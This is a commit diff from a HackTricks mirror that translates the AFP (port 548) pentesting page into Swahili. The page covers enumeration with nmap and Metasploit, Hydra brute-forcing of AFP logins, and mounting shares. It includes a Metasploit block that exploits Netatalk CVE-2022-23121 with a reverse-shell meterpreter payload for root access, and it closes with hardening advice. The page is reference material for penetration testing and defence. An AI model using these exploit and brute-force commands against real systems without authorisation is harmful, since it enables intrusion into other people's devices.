maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/network-services-pentesting/584-pentesting-afp.md'] to

Browse Source
This commit is contained in:
Translator 2025-08-14 03:07:22 +00:00
parent ac652afbca
commit 76c9e14753
1 changed files with 96 additions and 14 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

110
src/network-services-pentesting/584-pentesting-afp.md
View File

@ -4,27 +4,109 @@
## Basic Information
**Apple Filing Protocol** (**AFP**), ambayo hapo awali ilijulikana kama AppleTalk Filing Protocol, ni protokali maalum ya mtandao iliyojumuishwa ndani ya **Apple File Service** (**AFS**). Imepangwa kutoa huduma za faili kwa macOS na Mac OS ya jadi. AFP inajitofautisha kwa kuunga mkono majina ya faili ya Unicode, POSIX na ruhusa za orodha ya udhibiti wa ufikiaji, resource forks, sifa za ziada zenye majina, na mifumo ya hali ya juu ya kufunga faili. Ilikuwa protokali kuu ya huduma za faili katika Mac OS 9 na toleo la awali.
The **Apple Filing Protocol** (**AFP**), zamani ikijulikana kama AppleTalk Filing Protocol, ni protokali maalum ya mtandao iliyojumuishwa ndani ya **Apple File Service** (**AFS**). Imeundwa kutoa huduma za faili kwa macOS na Mac OS ya jadi. AFP inajitofautisha kwa kuunga mkono majina ya faili ya Unicode, ruhusa za mtindo wa POSIX na ACL, forks za rasilimali, sifa za ziada zenye majina na mifumo ya kisasa ya kufunga faili.
**Default Port:** 548
Ingawa AFP imeondolewa na SMB katika toleo za kisasa za macOS (SMB ni chaguo-msingi tangu OS X 10.9), bado inakutana katika:
* Mazingira ya zamani ya macOS / Mac OS 9
* Vifaa vya NAS (QNAP, Synology, Western Digital, TrueNAS…) vinavyoshirikisha daemon ya wazi **Netatalk**
* Mitandao ya mchanganyiko ya OS ambapo Time-Machine-over-AFP bado imewezeshwa
**Default TCP Port:** **548** (AFP over TCP / DSI)
```bash
PORT STATE SERVICE
548/tcp open afp
PORT STATE SERVICE
548/tcp open afp
```
### **Uhesabu**
---
Kwa uhesabu wa huduma za AFP, amri na skripti zifuatazo ni muhimu:
## Enumeration
### Quick banner / server info
```bash
msf> use auxiliary/scanner/afp/afp_server_info
nmap -sV --script "afp-* and not dos and not brute" -p <PORT> <IP>
# Metasploit auxiliary
use auxiliary/scanner/afp/afp_server_info
run RHOSTS=<IP>
# Nmap NSE
nmap -p 548 -sV --script "afp-* and not dos" <IP>
```
**Scripts na Maelezo Yao:**
Useful AFP NSE scripts:
- **afp-ls**: Skripti hii inatumika kuorodhesha volumu na faili za AFP zinazopatikana.
- **afp-path-vuln**: Inoorodhesha volumu na faili zote za AFP, ikionyesha uwezekano wa udhaifu.
- **afp-serverinfo**: Hii inatoa maelezo ya kina kuhusu seva ya AFP.
- **afp-showmount**: Inoorodhesha sehemu za AFP zinazopatikana pamoja na ACL zao husika.
| Script | What it does |
|--------|--------------|
| **afp-ls** | Orodha ya kiasi na faili za AFP zinazopatikana |
| **afp-brute** | Nguvu ya nywila dhidi ya kuingia kwa AFP |
| **afp-serverinfo** | Tupa jina la seva, aina ya mashine, toleo la AFP, UAM zinazoungwa mkono, nk. |
| **afp-showmount** | Orodha ya sehemu pamoja na ACL zao |
| **afp-path-vuln** | Hupata (na inaweza kutumia) mwelekeo wa saraka, CVE-2010-0533 |
### [**Brute Force**](../generic-hacking/brute-force.md#afp)
The NSE brute-force script can be combined with Hydra/Medusa if more control is required:
```bash
hydra -L users.txt -P passwords.txt afp://<IP>
```
### Kuingiliana na hisa
*macOS*
```bash
# Finder → Go → "Connect to Server…"
# or from terminal
mkdir /Volumes/afp
mount_afp afp://USER:[email protected]/SHARE /Volumes/afp
```
*Linux* (ukitumia `afpfs-ng` iliyopakiwa katika usambazaji nyingi)
```bash
apt install afpfs-ng
mkdir /mnt/afp
mount_afp afp://USER:[email protected]/SHARE /mnt/afp
# or interactive client
afp_client <IP>
```
Mara tu imewekwa, kumbuka kwamba rasilimali za Mac za jadi zinaifadhiwa kama faili za siri `._*` AppleDouble hizi mara nyingi zina data muhimu ambayo zana za DFIR zinakosa.
---
## Uthibitisho wa Kawaida & Ukatili
### Mnyororo wa RCE usio na uthibitisho wa Netatalk (2022)
Wauzaji kadhaa wa NAS walituma **Netatalk ≤3.1.12**. Ukosefu wa ukaguzi wa mipaka katika `parse_entries()` unaruhusu mshambuliaji kuunda kichwa kibaya cha **AppleDouble** na kupata **root ya mbali** kabla ya uthibitisho (**CVSS 9.8 CVE-2022-23121**). Andiko kamili kutoka NCC Group lenye PoC inayotumia Western-Digital PR4100 linapatikana.
Metasploit (>= 6.3) inatoa moduli `exploit/linux/netatalk/parse_entries` ambayo inatoa mzigo kupitia DSI `WRITE`.
```bash
use exploit/linux/netatalk/parse_entries
set RHOSTS <IP>
set TARGET 0 # Automatic (Netatalk)
set PAYLOAD linux/x64/meterpreter_reverse_tcp
run
```
Ikiwa lengo linaendesha firmware iliyoathiriwa ya QNAP/Synology, ufanisi wa unyakuzi unatoa shell kama **root**.
### Netatalk OpenSession heap overflow (2018)
Netatalk ya zamani (3.0.0 - 3.1.11) ina udhaifu wa kuandika nje ya mipaka katika **DSI OpenSession** handler inayoruhusu utekelezaji wa msimbo usio na uthibitisho (**CVE-2018-1160**). Uchambuzi wa kina na PoC zilichapishwa na Tenable Research.
### Masuala mengine muhimu
* **CVE-2022-22995** Uelekeo wa symlink unaopelekea kuandika faili bila mipaka / RCE wakati AppleDouble v2 imewezeshwa (3.1.0 - 3.1.17).
* **CVE-2010-0533** Safari ya saraka katika Apple Mac OS X 10.6 AFP (ilivyogunduliwa na `afp-path-vuln.nse`).
* Hitilafu nyingi za usalama wa kumbukumbu zilisuluhishwa katika **Netatalk 4.x (2024)** inapendekezwa kuboresha badala ya kurekebisha CVEs za kibinafsi.
---
## Mapendekezo ya Kijamii
1. **Zima AFP** isipokuwa inahitajika kwa dharura tumia SMB3 au NFS badala yake.
2. Ikiwa AFP lazima ibaki, **boresha Netatalk hadi ≥ 3.1.18 au 4.x**, au tumia firmware ya muuzaji inayorejesha patches za 2022/2023/2024.
3. Lazimisha **UAMs Imara** (mfano *DHX2*), zima maandiko wazi na kuingia kwa wageni.
4. Punguza TCP 548 kwa subnets zinazotegemewa na uweke AFP ndani ya VPN wakati inakabiliwa mbali.
5. Piga skana mara kwa mara kwa kutumia `nmap -p 548 --script afp-*` katika CI/CD ili kugundua vifaa vya uasi / vilivyoshuka.
---
### [Brute-Force](../generic-hacking/brute-force.md#afp)
## Marejeleo
* Netatalk Security Advisory CVE-2022-23121 "Utekelezaji wa msimbo wa kiholela katika parse_entries" <https://netatalk.io/security/CVE-2022-23121>
* Tenable Research "Kutatua Hitilafu ya Miaka 18 (CVE-2018-1160)" <https://medium.com/tenable-techblog/exploiting-an-18-year-old-bug-b47afe54172>
{{#include ../banners/hacktricks-training.md}}